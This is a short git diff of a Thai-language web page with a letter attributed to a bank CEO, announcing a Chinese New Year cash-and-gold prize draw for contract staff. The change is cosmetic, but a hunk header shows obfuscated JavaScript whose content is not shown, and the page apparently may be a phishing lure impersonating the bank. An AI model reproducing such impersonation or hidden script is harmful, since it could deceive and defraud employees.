--- a/index.html
+++ b/index.html
@@ -175,7 +175,7 @@
                 <h2 class="text-xl font-black text-slate-800 mb-1">ปิติ ตัณฑเกษม</h2>
                 <p class="text-xs text-ttb-orange tracking-widest mb-6">Chief Executive Officer<br>ธนาคารทหารไทยธนชาต จำกัด (มหาชน)</p>
                 <div class="bg-slate-50 p-7 rounded-[32px] border border-slate-100 text-left space-y-5">
-                    <p class="text-slate-600 leading-relaxed text-lm italic font-medium">"สวัสดีครับ เพื่อนพนักงานสัญญาจ้างภายนอก"</p>
+                    <p class="text-slate-600 leading-relaxed text-lm font-medium">สวัสดีครับ เพื่อนพนักงานสัญญาจ้างภายนอก</p>
                     <p class="text-slate-500 leading-relaxed text-ls indent-8">ตลอดปีที่ผ่านมา การเดินทางของทีทีบีไม่อาจเกิดขึ้นได้อย่างสมบูรณ์ หากขาดแรงสนับสนุนจากพนักงานสัญญาจ้างภายนอกทุกคน ที่ร่วมกันทำงานอย่างตั้งใจ รับผิดชอบ และทุ่มเทในบทบาทของตนเองอย่างเต็มความสามารถ</p>
                     <p class="text-slate-500 leading-relaxed text-ls indent-8">เพื่อแสดงความชื่นชมและขอบคุณที่ทุกคนมีส่วนช่วยขับเคลื่อนทีทีบีตลอดปีที่ผ่านมา ธนาคารจึงได้จัดกิจกรรมพิเศษ “<b>อั่งเปาโชคสองชั้น</b>” ขึ้น เพื่อมอบความสุขเล็ก ๆ ผ่านโอกาสในการลุ้นโชค รับของรางวัลในเทศกาลตรุษจีนปีนี้ ที่มีทั้งเงินสดและทองคำ</p>
                     <p class="text-slate-500 leading-relaxed text-ls indent-8">ผมหวังเป็นอย่างยิ่งว่า กิจกรรมนี้จะช่วยเติมรอยยิ้มและเป็นกำลังใจให้ทุกคนมีพลัง และขอเป็นตัวแทนทีทีบีขอบคุณทุกคนอีกครั้งสำหรับความร่วมมือและเป็นส่วนหนึ่งที่ช่วยให้ทีทีบีสร้างการเปลี่ยนแปลงที่มีความหมาย ขออวยพรให้ทุกคนประสบความสำเร็จในสิ่งที่ตั้งใจ มีสุขภาพทางกาย ใจ และการเงินที่ดีนะครับ</p>
@@ -348,5 +348,6 @@ const _0x3d0c4f=_0x1a93;(function(_0x5aa6ea,_0x36c55f){const _0x1783f5=_0x1a93,_
 </body>
 
 </html>
+
 
 
